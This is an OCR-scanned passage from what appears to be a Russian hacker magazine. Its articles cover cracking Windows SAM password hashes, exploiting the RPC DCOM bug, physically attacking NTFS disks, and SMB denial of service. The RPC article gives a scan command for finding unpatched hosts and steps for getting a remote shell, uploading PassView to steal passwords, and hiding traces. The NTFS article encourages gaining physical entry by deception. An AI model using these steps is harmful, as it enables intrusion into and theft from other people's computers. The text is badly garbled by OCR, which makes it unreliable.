полняющихся буферах оно не всегда 
есть. Вместо этого командный интерп- 
ретатор вызывается по его UCXOGHO- 
му имени cmd.exe, позволяя тем са- 
мым обнаружить атаку на самых ран- 
них ее стадиях. 


ЗАКЛЮЧЕНИЕ 

и Человеку, привыкшему к прелес- 
тям графических интерфейсов, кома- 
наный интерпретатор на первых по- 
рах покажется жутко непроизводи- 
тельным и неудобным. Однако со вре- 
менем ощущение дискомфорта про- 
ходит и курсор начинает биться в 
такт сердцу компьютерщика :). Опера- 
ции, ранее отнимавшие чудовищное 
количество времени, теперь выпол- 
няются одним легким пассом над кла- 
виатурой. Известно много случаев, 
когда люди переходили с графичес- 
ких сред в консольные оболочки, но 
я не знаю ни одно поклонника коман- 
дой строки, который променял бы ее 
на «интуитивно понятный» интер- 
фейс Widows 2000/ХР. SE 
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о ПОШАГОВАЯ ИМПЕРСОНАЛИЗАЦИЯ — 


Полуэктов Александр aka PolASoft (www.insidepro.com) 


ПОШАГОВАЯ 


ИМПЕРСОНАЛИЗАЦИЯ` 


ВЗЛОМ АДМИНСКОГО ПАРОЛЯ В WINDOWS 2000/XP/2003 


ароль администратора - лакомый кусочек для хакера. Получив права админа, ты можно творить на взломанной 


машине что угодно. 


звестных способов 


взлома OC Windows 


2000/XP/2003 gocta- 


точно много. Вот ос- 
новные: 

ш получение прав администратора 
путем восстановления пароля из 
$АМ-базы 

и взлом через уязвимости в паке- 
тах, установленных на компьютере: 
миеб-сервер (IIS, PWS, FrontPage serv- 
er), ЕТР-сервер и т.д. 

ш внедрение на компьютер троянов, 
кейлоггера и прочих шпионов 

ш снифинг сети для перехвата паро- 
лей на вход в сеть (которые "по сов- 
местительству" являются и паролями 
на вход в ОС) 

ш использование эксплоитов, реа- 
лизующих дыры в сетевых протоко- 
лах или службах Windows 

ш обход проверки правильности ав- 
торизации в ОС (к примеру, использо- 
вание пропатченной версии библио- 
теки MSV1_0.DLL для Windows 2000) 

Мы же остановимся на восстановле- 
нии пароля администратора из $АМ-ба- 
зы, так как это один из самых распрост- 
раненных методов, который, к тому же, 
не требует обширных знаний в области 
компьютерной безопасности. Но при ре- 
ализации этого способа необходим сри- 
зический доступ к компьютеру-клиенту. 


МЕТОДЫ "ЧЕРНОГО" ВЗЛОМА 

и Для начала рассмотрим методы 
получения доступа к аккаунту адми- 
нистратора, не восстанавливая его па- 
роль, а обнуляя его или устанавливая 
новый. Наиболее часто при полном 
доступе к SAM-6a3e меняются логины 
и пароли напрямую, что позволяет, 
даже не зная пароля админа, обну- 
лить его в 5АМ-базе и войти в систе- 
му с пустым паролем. Для этого нуж- 
на одна из следущих программ: 

ш CIA Commander (ул tapol.de) 

m ERD Commander (ww.winternals.com) 

ш Offline NT Password & Registry 


nome.eunet.no/~pnordahl/ 


ntpasswd/ 

ш ряд Ипих-утилит gna доступа к 
SAM-6a3e, когда на машине установ- 
лены две OC - Windows и Linux 
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Использование этих программ - 
простой и надежный способ получе- 
ния прав админа, но при этом теряет- 
ся его оригинальный пароль. К сожа- 
лению, вмешательство вряд ли оста- 
нется незамеченным для того, кто 
этот пароль установил :). Поэтому 
данный метод чаще используется не 
для доступа по чужому паролю, а для 
восстановления своего собственного 
забытого аккаунта. 

Есть еще вариант удаления срайлов 
SAM и SAM.LOG, которые B Windows 
МТ приводят к тому, что можно войти 
в систему с пустым паролем и логи- 
ном админа "по умолчанию". В 
Windows 2000/ХР/2003 такой трюк не 
проходит, и ОС отказывается загру- 
жаться вообще или же использует 
для загрузки 5АМ-базу из резервных 
каталогов (типа \Windows\Repair). Но 
возможность подмены 5АМ-базы все- 
таки есть. 


ПОЛУЧЕНИЕ ДОСТУПА 
К SAM-BA3E 

м При попытке прочитать файл SAM 
(расположенный в каталоге 
C:\WINDOWS\System32\Config) ты по- 
лучишь сообщение системы о нару- 
шении доступа к файлу. Этот дфайл 


(да и все остальные файлы без рас- 
ширений из этого каталога) - cppar- 
менты реестра, постоянно используе- 
мые системой, и только ОС имеет к 
ним доступ, причем монопольный. 
Кстати, именно из-за этого нет необ- 
ходимости под Windows 2000/XP пе- 
резагружать программу после раз- 
личных действий с реестром, так как 
все изменения вступают в силу мо- 
ментально. 

Тебе нужно получить к ним доступ 
не из самой ОС. Как же это сделать? 
Здесь два пути, и они отличаются в 
зависимости от файловой системы, 
которая установлена на системном 
диске с Windows. Если там FAT32, то 
доступ к базе можно получить даже с 
загрузочной дискеты, созданной в 
Windows 98, или с любой OC, установ- 
ленной как альтернативная на данном 
компьютере. Загружаемся с дискеты и 
обыкновенной ВО5-командой COPY 
копируем 5АМ-базу в другое место, не 
забывая про файл SYSTEM, в котором 
хранится ключ SYSKEY. 

Если же Tam NTFS, то необходима 
возможность загрузки со специаль- 
ной дискеты. А в BIOS нужно устано- 
вить соответствующую последова- 
тельность загрузки системы: сначала 


Если там FAT32, то доступ к базе можно 
получить даже с загрузочной дискеты, 
созданной в Windows 98. 


с флоппи-диска, затем все остальное. 
На вход в BIOS стоит пароль? Обнуля- 
ем его перемычками на материнской 
плате или же пробуем вводить паро- 
ли, зарезервированные разработчи- 
KOM BIOS для супервизорского входа. 
Далее на любой другой машине за- 
пускаем утилиту bootdisk.exe из паке- 
та NTFSDos Pro ( )и 
создаем с ее помощью загрузочный 
диск, который позволит "подмонтиро- 
вать" МТЕ$-разделы и "увидеть" их 
из-под DOS. Затем останется скопиро- 
вать ЗАМ/5У$ТЕМ-файлы в другое 
место (можно на дискету, используя 
любой ОО5-архиватор). 


ТРЕПАНАЦИЯ $АМ-БАЗЫ 
В итоге, после всех манипуляций 

срайлы SAM и SYSTEM надо загрузить 
в специальную программу, к примеру 
SAMInside ( ), и можно 
начинать восстанавливать пароли. 

Попробуем на практике с помощью 
SAMInside восстановить пароли из 
ЗАМ-базы, например, с такими хэшами: 


Выводы: 
- администратор не совсем глуп и сде- 
лал пароль с длиной более 14 символов 


ЕТ 


ний, 


ИТ 


ый 


(это видно из того, что LM-naponb отк- 
лючен, хотя МТ-пароль присутствует); 

- учетная запись гостя или отключе- 
на вообще и не используется, или же 
позволяет войти с пустым паролем; 

- пользователь «Иван» не стал ду- 
мать над паролем и ввел самую попу- 
лярную клавиатурную комбинацию 
(исключая Ctrl+Alt+Del, конечно) - 
"qwerty": 


ХРАНЕНИЕ ПАРОЛЕЙ 


- пользователь "petyal980" сделал 
еще проще: он использовал в качест- 
ве пароля свой логин; 

- также видно, что программа 
SAMInside моментально нашла два 
окончания паролей - 33 и 567890 
еще для двух пользователей. 

Для начала неплохо! Стоит заме- 
тить, что данная функция SAMInside 
("интеллектуальная" загрузка хэшей) 
позволяет моментально оценить уро- 
вень квалификации пользователей 
на данном компьютере, и по статисти- 
ке 5-10% паролей (или окончаний па- 
ролей) восстанавливаются уже на 
этапе загрузки хэшей. 

Итак, начинаем анализ. Самый про- 
дуктивный алгоритм восстановления 
паролей - перебор нескольких мето- 
дик по возрастанию их времени рабо- 
ты, ориентируясь на планируемую 
сложность паролей. 

©. Видно, что в паролях есть циф- 
ры, поэтому начнем с перебора по 
цифрам. 

Устанавливаем перебор по LM-x3- 
шам, алоравит - только цифры, очи- 
щаем начальный пароль (поле "Па- 
роль") и запускаем перебор. 

Через несколько секунд восстано- 
вился один пароль, полностью состо- 
ящий из цифр - 11222333. Неплохо. 


» 
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©. Теперь начинаем перебор по сло- 
варю. Для этого нужно скачать сло- 
варь с 

‚ 90- 

бавив в список, и запустить перебор. 
Не забываем включить сфлажки для 
проверки паролей, состоящих из двой- 
ных паролей и из паролей с обратным 
порядком букв. Через несколько ми- 
нут мы получим результат. 


@. Пробуем на зуб пароль пользо- 
вателя пео. Как видно, пароль закан- 
чивается на комбинацию 567890, на- 
Yano же неизвестно. Но можно Npeg- 
положить, что первая половина паро- 
ля заканчивается на 4 или даже 34. А 
можно сразу попробовать 1234 :). Отк- 
рываем настройки атаки по маске и 
вводим маску. 

Ура! Пароль найден - пео1234567890. 
Если бы мы не нашли пароль, то име- 
ло бы смысл попробовать окончание 
пароля на 4, 34 или 234. Или запус- 
тить перебор с символами A...Z и 0...9. 

@. Остался пароль администратора. 
По | М-хэшам его восстановить не полу- 
чится - только по МТ-хэшам. А это прак- 
тически бесполезное дело, так как МТ- 
пароль регистрозависимый и даже для 
анализа паролей только из латиницы 
придется использовать два алфравита: 
А... и a...Z. Но напоследок попробуем 
гибридную атаку. Укажем, что к паролям 
из словаря нужно добавлять go 2 сим- 
волов справа и слева (при этом срлажки 
для сдвоенных паролей и паролей с об- 
ратным порядком букв снимаем - мы их 
уже проверили). Запускаем программу и 
идем за пивом, так как гибридная атака - 
процесс длительный. Через некоторое 
время мы увидим, что пароль все-таки 
найден - administrator$s. 

В итоге, мы имеем 100% восстанов- 
ленных паролей. Конечно, данные па- 


роли приведены лишь для примера, но, 
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ЗАМЕНА $АМ-БАЗЫ 


МЕТОДЫ ВОССТАНОВЛЕНИЯ ПАРОЛЕЙ 


| 
как показывает практика, go 95-98% 


паролей восстановить все-таки можно. 


Лучше всего применять поочередно 
различные виды атак и словари боль- 


ПИ 
шего объема. А при наличии любой 
предварительной инорормации о паро- 
ле использовать ее максимально эср- 
срективно! Конечно, пароли вида 


ПРОГРАММЫ ДЛЯ РАБОТЫ С $АМ-БАЗАМИ 
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16&7(А\/Мгпсх{` [Р% восстановить 
практически невозможно, но ведь есть 
еще и человеческий срактор, социаль- 
ная инженерия и т.п. Так что иногда 
можно узнать пароль и без 5АМ-базы. 
Очевидно, что восстановление паро- 
лей - процесс творческий и требует 
хорошей интуиции. Любое окончание 


пароля (если он длиннее 7, но короче 
14 символов), будучи найденным в 
первую очередь, дает обильную пищу 
для размышлений. Алгоритмов, по ко- 
торым пользователи формируют свои 
пароли, на самом деле не так уж и 
много. Так что анализ, анализ и еще 
раз анализ! Se 
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Практика 
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И НЕ ЗАБУДЬ: 


ТВОЯ МАМА 


БУДЕТ В ШОКЕ! 


RPC DCOM ДЛЯ МЛАДШЕГО БРАТИКА ) 


Наумов Юрий aka Crazy_Script (crazy_script@vr-online.ru) 


RPC DCOM ДЛЯ 
МЛАДШЕГО БРАТИ 


ПОПУЛЯРНАЯ ЭКСПЛУАТАЦИЯ ИЗВЕСТНОГО БАГА 
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е так давно ВРС-уязвимость гремела на весь мир. Повальные взломы, MSBlast, снова повальные взломы. На эту тему 
написана куча статей и мануалов. Тем не менее, остаются еще те, кто не пропатчил свою систему и не установил даже 
персональный фаервол. 


ТЕОРИЯ 


m RPC (Remote 


Procedure Call - yganeH- 


ный вызов процедур) - 


это механизм, позволя- 


ющий программе на одном компьюте- 
ре выполнять некий код на удаленной 
машине. Компания Sun Microsystems 
была одной из первых, реализовав- 
ших эту службу. RPC базировалась на 
протоколе внешней передачи данных 
XDR (external Data Representation). 
Все это Sun делала gna Toro, чтобы 
обеспечить взаимодействие сетевой 
информационной службы и файло- 
вой системы. После первого шага ком- 
пании службы КРС стали использо- 
ваться и в продуктах семейства UNIX, 
а позже - в Windows. 

Баг был обнаружен в июле 2003 го- 
да в продуктах Microsoft Windows 
МТ/2000/ХР/2003 польскими экспер- 
tamu Last Stage of Delirium. Тогда мож- 
но было завалить невероятное коли- 
чество серверов, ведь лишь малая их 
часть блокировала входящие пакеты 
на порт 135, через который осущес- 
твлялась атака. Буквально сразу же 
стало известно, что уязвимы все сер- 
висы RPC, а это еще 139-й, 445-й и 
593-й порты. Если бы в то время вы- 
пустили публичный эксплоит, прои- 
зошла бы катастрофра. Но его не бы- 
ло, и сетевая общественность про- 
должала жить спокойно, не задумы- 
ваясь об этой дырке. 

Но так не могло долго продолжать- 
ся. В конце июля того же года появи- 
лось техническое описание уязвимос- 


НТ а ЛБОРГГААЗУЗТЕН 


ML ЗИ 
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ти, стали появляться эксплоиты и воз- 
никла глобальная угроза MSBlast. 


EXPLOIT’ ALMA БАЖНОЙ ТАЧКИ 

и Осуществить RPC DCOM-atTaky мо- 
жет любой. Для этого, с позволения 
сказать, «взлома» нам необходимы: 

@. RPC GUI Ехрк, написанный че- 
ловеком по имени r3l4x. Точнее ска- 
зать, им написана только графичес- 
кая оболочка, сам же сплоит принад- 
лежит ребятам из LSD Security Group. 

©. КАНТ2 для поиска бажной тачки 
(если надо ее искать). 

@. Какая-нибудь программа для 3a- 
имствования паролей и прочей вкус- 
ности. Например, PassView 1.5. 

Итак, начнем. Самое главное - найти 
непропатченную тачку. Для этого нам 
и нужен КАНТ2. Пример: 


C:\xtools\kaht2 10.0.0.1 10.0.0.255 500 
Значение threads, стоящее после диа- 


пазона IP, можно поставить и 100, и 80 
- кому как удобнее (по умолчанию 50). 


J) Вл 296 


| A вот и непропатченная тачка! 


Запускаем GUI RPC Exploit. Вводим 
айпишник, который нам выдал КАНТ, 
и жмем Test. Должно высветиться 
«Connected!». Переходим во вкладку 
FTP Server и жмем старт, затем - BO 
вкладку Exploit. Нажимаем «Exploit!», 
и нашему взору открывается шелл. 
Вот что должно получиться после за- 
пуска сплоита: 


-- wOOt -- 


Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsfot Corp. 


C:\WINDOWS\system32> 


Хочу заметить, что мы имеем воз- 
можность выбора удаленной ОСи 
(МИп2О00[А! или WinXP[AII]). Возника- 
ет вопрос: а что если на удаленной 
машине с открытым 135-м портом сто- 
ит WinNT? Для этого к сплоиту прила- 
гается список возвращаемых адресов 
(файл RET.txt). Все, что требуется, - 
найти в этом списке нужную версию 


Ш www-securitylab.ru/_exploits/kaht2.zip - сканер для обнаружения бага 
Ш www.securitylab.ru/_tools/PTms03039.zip - утилита от РТ gna 
проверки локальной сети на баг 

Ш www-.security.nnov.ru/search/news.asp?binid=2988&I=RU - все 


разновидности эксплоитов и оригинальные тексты 

Ш www-.securitylab.ru/_tools/RPC2.zip - GUI PRC EXploit v2 Бу r3l4x 
№ www.web-hack.ru/download/info.php?go=44 - PassView v1.5 

Ш www.microsoft.com/technet/security/bulletin/MSO3-026.asp - 


патч от MC 


ОСи и вписать адрес в соответствую- 
щую строку Return Adress. 

Итак, мы получили доступ. Теперь 
наша цель - закачать сдфайлы 
passview.exe и export.bat (оба из ска- 
чанной ранее PassView 1.5). Для этого 
стартуем ftp: 


ИНТЕРВЬЮ С ПРОФЕССИОНАЛОМ 


В файле export.txt будут все пароли, 
которые должна была достать прог- 
рамма PassView. Осталось только за- 
мести следы: 


ТИ гы 


Разумеется, это только приблизи- 
тельный план действий. 


DEFENCE 

А теперь про защиту. Можно по 
старинке отключить DCOM: лезем в 
реестр в 


HKEY_LOCAL_MACHINE\Software\Micr 369 аа - 
osoft\OLE и изменяем значение переломный 
EnableDCOM с "У" на "К" момент в 
: эксплуата- 
Есть еще способ через утилиту ции ВРС: 
dcomcnfg.exe (меню Пуск -> Выпол- техническое 
б описание 
нить), но проще всего блокировать бага, мно- 
входящие пакеты на порты 135, 139, жество 
7 сплоитов, 
445 и 593 и установить патчи, а глав MSBlast. 
ное - SP2. 
Кстати, вот что говорит Microsoft no 
поводу отключения DCOM: «Если вы 
отключаете DCOM, вы можете поте- 
рять функциональные возможности A 
~, втор 
операционной системы. После того татьи 
как вы отключаете поддержку DCOM, редакция 
может случиться следующее. Любой урналане 
^ несут ника- 
СОМ-объект, который может быть ак- кой ответ- 
тивирован дистанционно, перестанет ственности 
6 n й COM+ № за деиствия, 
работать. Локальный snap-in не совершен- 
сможет подключаться к удаленным ные ый 
лем. Бся 
серверам. Функция авторегистрации информация 
сертификатов может неправильно дана в сугу- 
функционировать. Запросы Windows р. 
Management Instrumentation (WMI) целях. 
удаленных серверов могут непра- 
вильно функционировать. Потенци- 
ально существует множество встро- 
енных компонентов и сторонних при- 
ложений, которые могут перестать ра- MSBlast - 
ботать, если вы отключите DCOM. червь м 
. = основе бага 
Microsoft рекомендует проверить ра RPC DCOM - 
ботоспособность всех приложений, стал самым 
7 разруши- 
используемых в вашей среде, после ем а 
отключения DCOM. Microsoft также всю исто- 
предупреждает, что не во всех средах аня 
можно отключить СОМ». Se р 
=a 


J ee a 
js i 
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6 ЧЕРЕЗ ОБРАЗЫ К CEP. 
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ЧЕРЕЗ ОБРАЗЫ =. 
К СЕРДЦУ 


АТАКА НА МТЕ$ 


оступ к данным компьютера под управлением OC Windows можно получить многими способами. 
Одним из них является атака на последний рубеж защиты данных - на файловую систему МТЕ$. 


ласть над МТЕ$ дает 


возможности баналь- 


Horo копирования/под- 


мены информации, YC- 


Упомянутые 
способы 


чтения 
МТЕ$ не яв- 
ляются па- 
нацеей. 
NTFS nog- 
держивают 
многие OC, 
в том числе 
различные 
дистрибути- 
вы Linux, 
Lindows, 
BeOS, заг- 
ружаемые 
также с 
CD/DVD. 


тановки шпионских 
программ, изменения настроек и полу- 
чения нужного аккаунта заменой 
SAM-cpamna. Для осуществления ата- 
ки на NTFS необходимо иметь физи- 
ческий доступ к интересуемому объ- 
екту (компьютеру). При этом неважно, 
как ты этот доступ получишь: вор- 
вешься ночью в здание с чулком на 
голове, напоишь админа go беспамят- 
ства или же просто устроишься на ра- 
боту уборщиком, разыграв из себя 
имбецилла в пятом поколении. Глав- 
ное, иметь возможность считывать 
(записывать) данные со своих носите- 
лей и/или подключать внешние. 

Правда, при грамотном подходе сис- 
темного администратора к защите 
данных ты не обнаружишь каких-либо 
устройств для работы с внешними но- 
сителями (FDD, CD/DVD-ROM/R/RW). К 
хакерскому счастью, на подавляющем 
большинстве РС есть гнезда для USB- 
устройств. К ним и следует подклю- 
чить припасенный заранее внешний 
накопитель и настроить в BIOS загруз- 
ку свнешних У$В-девайсов. При nog- 
держке BIOS опции такого рода не все 
девайсы сгодятся на роль загрузочно- 
го устройства. Например, нельзя загру- 
зиться с получивших массовое распро- 
странение «свистков». Наиболее nog- 
ходящим вариантом являются диски 
ДЕ и переходники USB-IDE. И, конечно 
же, на внешнем носителе должна быть 
установлена любая операционная сис- 
тема с поддержкой NTFS. 

Если загрузка с внешнего устрой- 
ства прошла нормально и стали goc- 
тупны все разделы жесткого диска, 
тебе остается слить нужную инфор- 
мацию, произвести необходимые 
действия и быстро уносить ноги. При 
более неблагоприятных обстоятель- 
ствах (отсутствие У$В-портов, пароль 
на настройку BIOS или отсутствие 
поддержки загрузки с внешних уст- 
ройств) без вскрытия корпуса никак 
не обойтись. Если корпус не заключен 
в металлический сейф (а бывает и та- 
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Если загрузка с внешнего устройства 
прошла нормально и стали доступны 
все разделы жесткого диска, тебе остается 
слить нужную информацию, произвести 
необходимые действия 
и быстро уносить ноги. 


кое), спасет крестовая отвертка. А 
дальше просто - сбрасываешь наст- 
ройки BIOS, замкнув соответствую- 
щие контакты на материнской плате, 
подключаешь девайс в качестве заг- 
рузочного и по плану. Но вскрытие 
занимает больше времени, сопровож- 
дается грохотом и скрипом. 


ВАРИАНТ ПЕРВЫЙ 

и На компьютере присутствует ка- 
кой-либо дисковод и пароль Ha BIOS 
не установлен. Настраиваешь в BIOS 


Петти Ge SEL ава eet Cenk hers 


Rt ee ee ag) ee tT fet Fee Bae + 


ed == 


= тины ise t 


pero тт ep i a 1.9 ST ee 
ПИШЕТ 


‚бы [ = | = | 


ЕЕ etree ae веть 


приоритетную загрузку с нужного ти- 
па носителя. Загружаешь с диска опе- 
рационную систему, поддерживаю- 
щую NTFS. Далее действуешь на свое 
усмотрение. 


ВАРИАНТ ВТОРОЙ 

и На компьютере присутствует ка- 
кой-пибо дисковод. Установлен па- 
роль на BIOS. Доступна загрузка OC 
компьютера под любым аккаунтом. 

Попробуй ввести один из стандарт- 
ных паролей (AWARD_SW для изде- 
лия фирмы AWARD, 
AMI для продукции og- 
ноименной сфирмы) ли- 
бо при включении 
удерживай комбинацию 
клавиш 
<Ctrl>+<Alt>+<Del>+<Ins> 
или просто клавишу 
<Ins>. Если не помогло, 
попытайся запустить на 
машине программу, 
сбрасывающую наст- 
ройки BIOS. Для 
Windows существует 


ь = tom ioe ol = ГЕ 


ee лее винит: 


ae ea be el Я ee ed ee = 


Ree и eee nme ИГО, ee ee 


достаточно много таких 
программ: 
nopasswd.com, kill- 
cmos.exe, awcrack.com и 
T.g. Найти их можно в 
сети. 

Если все попытки 
тщетны, остается при- 
бегнуть к вскрытию 
корпуса. Минусов у по- 
добного способа нес- 
колько: кроме пароля, 
сбрасывается еще нес- 
колько важных настро- 
ек (например, время), 


Необходимые драйвера МТЕ: 


причем иногда загрузка невозможна 
без их изменения. Рано или позоно, 
но администратор заметит изменение 
пароля. В этот момент лучше нахо- 
диться на максимальном расстоянии 
от него :). 

После изменения порядка загрузки 
нужно воспользоваться загрузочным 
диском (или дискетами), оснащенным 
драйвером доступа к разделам МТЕ$ с 
возможностью записи. Для подготов- 
ки загрузочного комплекта понадо- 
бятся программа "МТЕ$00$ 
Professional” и четыре дискеты. 

Первая служит для начальной заг- 
рузки и может быть создана в любой 
OC Windows. Лучше всего для этой це- 
ли годится FDD, подготовленная в 
пресловутой Windows Ме. Что бы ни 
говорили про глючность Ме, но загру- 
зочные диски она готовит лучше всех: 
DOS загружается мгновенно, включе- 
на поддержка CD, даже без удаления 
лишних хелпов остается свободное 
место для файлового менеджера 
(например, Volkov Commander) и 
драйвера мыши (а куда без него :)). 
Перед использованием дискета нуж- 
дается в небольшом препарировании. 
В файле config.sys необходимо изме- 
нить значение параметра files=10 Ha 
files=50 или большее. Остальные три 
дискеты скорми программе 
BootDisk.exe. 

Если коротко, то порядок работы 
с полученным инструментом следу- 
ющий: 

@. Загружаешь компьютер с первой 
дискеты в режиме "Minimal boot" 

©. Вручную запускаешь файл МТЕ- 
SPRO.EXE со второй дискеты 

@. По требованию вставляешь сле- 
дующую дискету 


СПИСОК ФАЙЛОВ, НЕОБХОДИМЫХ ДЛЯ РАБОТЫ NTFS- 
DOS PROFESSIONAL И NTFS FOR WINDOWS 98 


и а 
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——— = 


ald 
р 
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Укажи папку с драйверами NTS 


ре никый ТЕТЕ 


| 


Дополнительные настройки 


Ф. По окончании загрузки програм- 
мы возвращаешь в дисковод загру- 
зочную дискету 

Дальнейшие действия - на твое ус- 
мотрение. Можешь проверить раздел 
утилитой NTFSCHK с третьей дискеты. 
Можешь производить манипуляции с 
файлами и каталогами из командной 
строки или загрузив файловый ме- 


Для подготовки загрузочного комплекта 
понадобятся программа “NTFSDOS 
Professional” и четыре дискеты. 


неджер. Сжатые объекты, как и в 
Windows 2000/XP, поддерживаются 
прозрачно для пользователя. Разни- 
ца перед ГАТ ощущается лишь в нез- 
начительно пониженной скорости при 
копировании/перемещении сфайлов. 
Во избежание повреждения структу- 
ры диска и корректного сохранения 
дескрипторов завершение работы 
следует производить комбинацией 
<Ctrl>+<Alt>+<Del>, а He RESET или вык- 
лючением питания. 


ВАРИАНТ ТРЕТИЙ 
На компьютере установлены две 
операционные системы, одна из кото- 
рых - Windows 9х. 
Сливаешь с сайта 
программу NTFS for Windows 98. От- 
личие настройки этой программы от 


АТАКА HA WINDOWS 


Norton Ghost 32 - дамп диска в Windows 


Работа с Ghost Explorer - как с Проводником 


ATAKA HA WINDOWS 


ЧЕРЕЗ ОБРАЗЫ К СЕРДЦУ ) 


Изменения в образе всегда можно сохранить 


Программы 
NTFSDOS 
Professional, 
NTFS for 
Windows 98 
и Norton 
Ghost nog- 
держивают 
как обыч- 
ные, так и 
сжатые 
МТЕ5$-диски. 


Незарегист- 
рированная 
AEFSDR 
расшифро- 
вывает 
только пер- 
вые 500 
байт файла. 


ее ВО$-версии незначительно. После 
установки следует указать располо- 
жение драйверов для доступа к 
NTFS. Затем указанные файлы пере- 
мещать и тем более удалять не сле- 
дует, так как без них программа ра- 
ботать не будет. Назначь буквы для 
подключаемых разделов (которые 
еще не заняты). В разделе Advanced 
настраиваются режимы буфериза- 
ции и периоды обновления метадан- 
ных. После перезагрузки в списке 
доступных дисков появятся подклю- 
ченные разделы. 


ВАРИАНТ ЧЕТВЕРТЫЙ 

m На компьютере установлены две 
операционные системы, одна из кото- 
рых - Windows 9x. На ЕАТ-диске есть 
свободное пространство объемом нем- 
ного больше 60% объема диска NTFS. 


№ Производители упомянутых программ: 


www.sysinternals.com 


www.symantec.com 
www.elcomsoft.com 


Известный сайт рунета, посвященный информационной безопас- 


ности - www.securitylab.ru 


Процесс займет время, которое напрямую 
зависит от производительности 
компьютера. 


Достаешь пакет программ Norton 
Ghost производства Symantec, жела- 
тельно версии не ниже 8.0. Этот пакет 
позволяет делать резервные копии 
как отдельных партиций, так и целых 
дисков. Сохраняя всю дфайловую сис- 
тему в один или несколько (в зависи- 
мости от занимаемого объема) сай- 
лов, используя сжатие, которое в 
среднем достигает 50%. Поддержива- 
ется несколько наиболее распростра- 
ненных файловых систем: FAT, FAT32, 
NTFS5, ext2 и HPFS. 

При этом программа Ghost Explorer 
предоставляет доступ к созданному 


Указанные сфайлы перемещать 
и тем более удалять не следует. 


ew т = Г — 
Сначала находишь ключи шифрования 
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архиву с возможностью копирова- 
ния/замены как отдельных файлов, 
так и целых директорий! Это значит, 
что ты можешь легко создать образ 
любого, не только NTFS диска, а затем 
скопировать из него нужные данные 
(например, файл SAM, отдав его на 
съедение утилите LOphtCrack), рабо- 
тая в Windows 9x без перезагрузок и 
каких-либо манипуляций с BIOS. 

Ни Ghost for Windows, ни Ghost 
Explorer не требуют установки. Чтобы 
создать образ партиции, выбери в 
меню программы Local -> Partition -> 
To image и укажи раздел и место, ку- 
да сохранить полученный образ. Спо- 
соб сжатия укажи High. Это позволит 
сократить размер полученного архи- 
ва партиции go 50%. Процесс займет 
время, которое напрямую зависит от 
производительности компьютера. 


ВСТРОЕННОЕ ШИФРОВАНИЕ 

m= Предположим, у тебя уже есть 
доступ к разделу NTFS, но ты полу- 
yun фиг с маслом. Как же так? Ведь 
говорилось, что на этом этапе можно 
забыть обо всех правах доступа! Вер- 
но, но права доступа здесь ни при 
чем. Для защиты от таких умников 
Microsoft оснастила разделы NTFS5 
дополнительной защитой - 
Encrypting File System (EFS, зашиф- 
рованная файловая система). NFS - 
надстройка Hag NTFS, позволяющая 
прозрачно для пользователя шиф- 
ровать и расшифровывать файлы. В 
сети, печатных журналах и много- 
численных учебниках можно найти 
хвалебные оды стойкости ЕЕ5-защи- 


_ = о ре ——_~ 


Выбирай, что хочешь расшифровать 


МНЕНИЕ ЭКСПЕРТА 


Поможет утилита Advanced EFS Data 
Recovery 2.0 (AEFSDR), произведенная сфир- 
MOU "Элкомсосрт". 


ты. Правда, авторами этих Og являют- 
ся так или иначе оплачиваемые 
Microsoft люди :). Но, как говорится, 
на всякую норку найдется буровая 
установка. И появляются различные 
утилиты, призванные укрепить и без 
того авторитетные заявления мелко- 
мягких об очередной абсолютной за- 
щите пользователей встроенными 
средствами шифрования. 

Поможет утилита Advanced EFS 
Data Recovery 2.0 (AEFSDR), произ- 
веденная фирмой "Элкомсосбрт". 
При всей аскетичности интерфейса 


программа обладает колоссальными 
возможностями: работа с зашифро- 
ванными разделами Windows 
2000/ХР/ХР-5Р1/2003 при защи- 
щенной пользовательской базе ути- 
литой SYSKEY, расшифровка при 
известных и неизвестных паролях 
пользователей и администраторов и 
поврежденных записях о ключах 
шифрования и, конечно же, обра- 
ботка «нерасшифруемых» файлов 
по причине краха операционной 
системы, то есть обработка файло- 


вых наборов. 


уже в продаже 


о УДАР ИЗДАЛЕКА ) 


орис Вольфсон (borisvolfson@mail.ru, borisvolfson.h11.ru) 


УДАР 
ИЗДАЛЕКА 


ТЕОРИЯ И ПРАКТИКА УДАЛЕННЫХ АТАК 


6 удаленных атаках сказано много. В интернете то и дело встречаешь слова «Оо$», «DDoS», «Syn-flood», 
«Роб»... В данной статье мы постараемся не только рассказать об основных видах атак, но и сухим программным 
кодом показать, как можно использовать различные бреши в системе безопасности для их проведения. 
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семирная паутина за- 


родилась в недрах ми- 


нистерства обороны 


США. Удивительно, но 


для интернета были 
разработаны не самые защищенные и 
безопасные протоколы TCP/IP. Имен- 
но различные тонкости реализации 
TCP/IP- и других протоколов исполь- 
зуются GNA проведения удаленных 
атак. Конечно, ошибки и недоработки, 
которыми может воспользоваться 
взломщик, есть не только в протоко- 
лах и операционных системах: уязви- 
мости в прикладной программе могут 
быть также использованы GNA атаки. 


С ЧЕМ ЕДЯТ 
УДАЛЕННЫЕ АТАКИ 

и Для начала взломщик должен 
иметь хотя бы одну машину, подклю- 
ченную к интернету, для проведения 
удаленной атаки :). Если планируется 
DDoS-ataka (Distributed Denial of 
Service), то чем больше машин будет 
использовано, тем лучше. Обычно 
для захвата пишется вирус (червь, 
троян), который заражает достаточно 
большое количество машин. Затем на 
атакуемый узел одновременно посы- 
лается множество запросов, после че- 
го жертва благополучно оказывается 
в ауте - происходит отказ в обслужи- 
вании. Атаку можно провести и с од- 
ного компьютера, нарушив сфункцио- 
нальность атакуемой машины. Такие 
атаки называют просто DoS, они зак- 
лючаются не в незаметной установке 
DOS'a вместо срорточек, как думают 
некоторые, а в том, чтобы повесить 
атакуемый комп. 


SMBDIE: ВНЕЗАПНАЯ СМЕРТЬ 

m SMB (Server Message Block) - это 
сетевой протокол одной небезызвест- 
ной фирмы на букву "М" для работы с 
срайлами, принтерами и тому подоб- 
ными вещами. Винду (МТ/2К/ХР/.МЕТ 
RC1), у которой включен NETBIOS, та- 
кая атака запросто отравит в нокаут. 
Теоретически SMBdie может позво- 
лить выполнить на удаленной маши- 
не произвольный код. А на практике 
уже реализована довольно эффек- 
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тивная DoS-ataka. Для убийства SMB 
необходимо послать специальный 
запрос. Народными умельцами созда- 
на программа SMBdie для проведения 
атаки, скачать ее можно с сайта раске!- 
storm.linuxsecurity.com. Сайт довольно на- 
дежный, но лучше лишний раз прове- 
рить скачанное антивирусом, ведь в 
процессе работы SMBdie его нужно 
будет отключить. 

Чтобы провести атаку, достаточно 
указать IP-agpec и NETBIOS-uma 
жертвы и нажать ОК, то есть kill, и 
